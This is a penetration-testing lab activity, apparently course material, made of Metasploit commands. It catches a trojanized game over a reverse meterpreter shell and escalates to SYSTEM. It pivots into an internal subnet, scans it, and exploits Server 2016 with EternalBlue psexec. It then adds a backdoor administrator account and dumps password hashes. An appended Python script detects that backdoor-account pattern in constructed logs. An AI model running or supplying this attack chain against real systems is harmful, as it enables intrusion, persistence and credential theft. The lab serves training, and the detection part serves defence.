Activity 6.12.4


--------------------------------------------------------------------
# On Kali:

# Prepare a handler to receive the malware connection on port 80

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 172.16.0.200
set lport 80
show options
run

---------------------------------------------------------------------
# On XP-PRO:
Double-click minecraft-mini.exe to "play" the game

----------------------------------------------------------------------

# On Kali:

Verify that the infected game connected to your handler, and that you have a meterpreter> prompt

# Determine the internal subnet ID
# At the meterpreter> prompt enter:

getuid
getsystem
getuid
# The route table identifies the internal IP subnet
route
background
# Make note of the meterpreter session #
sessions

# Create a pivot using meterpreter as a 
# pipeline into the internal network

search autoroute
use post/multi/manage/autoroute
set session 1
run

# Conduct a ping sweep of the internal network

search ping_sweep 
use post/multi/gather/ping_sweep
show options
set rhosts 10.10.10.0/24
set session 1
# Make note of the discovered IP addresses
run

# Port scan the internal hosts

search portscan
use auxiliary/scanner/portscan/tcp
show options
set ports 80,135,139,445,1433,3389
set rhosts 10.10.10.10-12
run

# ID the internal host OS versions

search scanner/smb
use auxiliary/scanner/smb/smb_version
show options
set rhosts 10.10.10.10-12
set threads 3
# Check whether the scan identifies each OS. Is one of them Server 2016?
run

# Attempt an EternalBlue PSEXEC buffer overflow attack against Server2016

search eternal
use exploit/windows/smb/ms17_010_psexec
show options
search payload windows/x64/meterpreter
set payload windows/x64/meterpreter/bind_tcp
set rhosts <server2016 IP>
set lhost <Kali IP>
set smbuser moo
set smbpass 1Password
show options
run

# Get information from Server2016

getuid

# Drop to a Windows command prompt (shell)

shell

# Create a backdoor administrator account

net user haxxor Letmein! /add
net localgroup administrators haxxor /add

# Return to meterpreter and dump Server2016 password hashes

sessions
sessions 2

search hashdump

use post/windows/gather/smart_hashdump
show options
set session 2
run
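Added example, not part of the original activity: a small Python detection that reads constructed Security-log-style lines (the key=value layout, field names and IP addresses are assumptions, not real Windows event text) and flags the artifact this lab leaves on Server2016: a newly created local user promptly added to Administrators, correlated with any preceding type-3 network logon so an analyst can see where the session came from.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the page or a real host), simplified key=value layout.
SAMPLE_EVENTS = """\
2024-05-01 10:02:11 EventID=4624 LogonType=3 TargetUser=moo SourceIP=10.10.10.99 Host=SRV2016
2024-05-01 10:02:40 EventID=4720 TargetUser=haxxor SubjectUser=SYSTEM Host=SRV2016
2024-05-01 10:02:41 EventID=4732 MemberName=haxxor Group=Administrators Host=SRV2016
2024-05-01 11:15:00 EventID=4720 TargetUser=svc_backup SubjectUser=Administrator Host=SRV2016
2024-05-01 13:00:00 EventID=4732 MemberName=svc_backup Group=Users Host=SRV2016
"""

LINE_RE = re.compile(r"^(\S+ \S+) (.*)$")


def parse_events(text):
    """Turn each line into a dict of its key=value fields plus a parsed timestamp."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        fields = dict(re.findall(r"(\w+)=(\S+)", m.group(2)))
        fields["ts"] = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append(fields)
    return events


def find_backdoor_admins(text, window=timedelta(minutes=5)):
    """Flag a 4720 (user created) followed within `window` by a 4732 adding the
    same account to Administrators; attach network logons seen just before it."""
    events = parse_events(text)
    findings = []
    for created in (e for e in events if e["EventID"] == "4720"):
        user = created["TargetUser"]
        for added in events:
            if (added["EventID"] == "4732" and added.get("MemberName") == user
                    and added.get("Group") == "Administrators"
                    and timedelta(0) <= added["ts"] - created["ts"] <= window):
                logons = [e for e in events
                          if e["EventID"] == "4624" and e.get("LogonType") == "3"
                          and timedelta(0) <= created["ts"] - e["ts"] <= window]
                findings.append({"user": user, "host": created["Host"],
                                 "created_by": created.get("SubjectUser"),
                                 "source_ips": sorted({l["SourceIP"] for l in logons})})
    return findings


if __name__ == "__main__":
    for f in find_backdoor_admins(SAMPLE_EVENTS):
        print(f"ALERT new local admin {f['user']} on {f['host']} "
              f"(created by {f['created_by']}, network logons from {f['source_ips']})")
```

The benign svc_backup account is not flagged because it never lands in Administrators, which is the distinction a real rule should keep rather than alerting on every 4720.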